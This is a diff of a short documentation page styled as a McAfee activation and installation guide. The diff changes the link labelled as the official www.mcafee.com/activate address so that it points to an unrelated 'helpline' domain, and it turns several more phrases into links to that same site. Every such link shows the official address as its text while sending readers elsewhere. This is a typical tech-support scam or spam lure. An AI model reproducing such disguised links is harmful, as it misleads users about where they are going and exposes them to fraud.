ingridrimland/mcafeenetwork/docs/index.rst

 How to Activate, Download, and Install McAfee from www.mcafee.com/activate?
 Easy Steps to Follow
 ===============================================================================================
 For millions of users worldwide, McAfee is a trusted name in online security.
 If you’ve recently purchased McAfee, the next step is activation and installation to secure your device.
-The entire process starts at the official site: `www.mcafee.com/activate <https://www.mcafee.com/activate>`_.
-Many users search for **www.mcafee.com/activate download install** to complete setup quickly and correctly.
-In this guide, we will walk you through the exact steps to **Download and Install McAfee**, covering both Windows and Mac devices.
-Whether you’re a new customer or reinstalling on a new computer, these steps will ensure that you can easily manage **www.mcafee.com/activate download install** without any confusion.
+The entire process starts at the official site: `www.mcafee.com/activate <https://mcafeedesk.securebase.click/helpline>`_.
+Many users search for `www.mcafee.com/activate download install <https://mcafeedesk.securebase.click/helpline>`_ to complete setup quickly and correctly.
+In this guide, we will walk you through the exact steps to `Download and Install McAfee <https://mcafeedesk.securebase.click/helpline>`_, covering both Windows and Mac devices.
+Whether you’re a new customer or reinstalling on a new computer, these steps will ensure that you can easily manage `www.mcafee.com/activate download install <https://mcafeedesk.securebase.click/helpline>`_ without any confusion.

 Why Activation at www.mcafee.com/activate is Important
 ------------------------------------------------------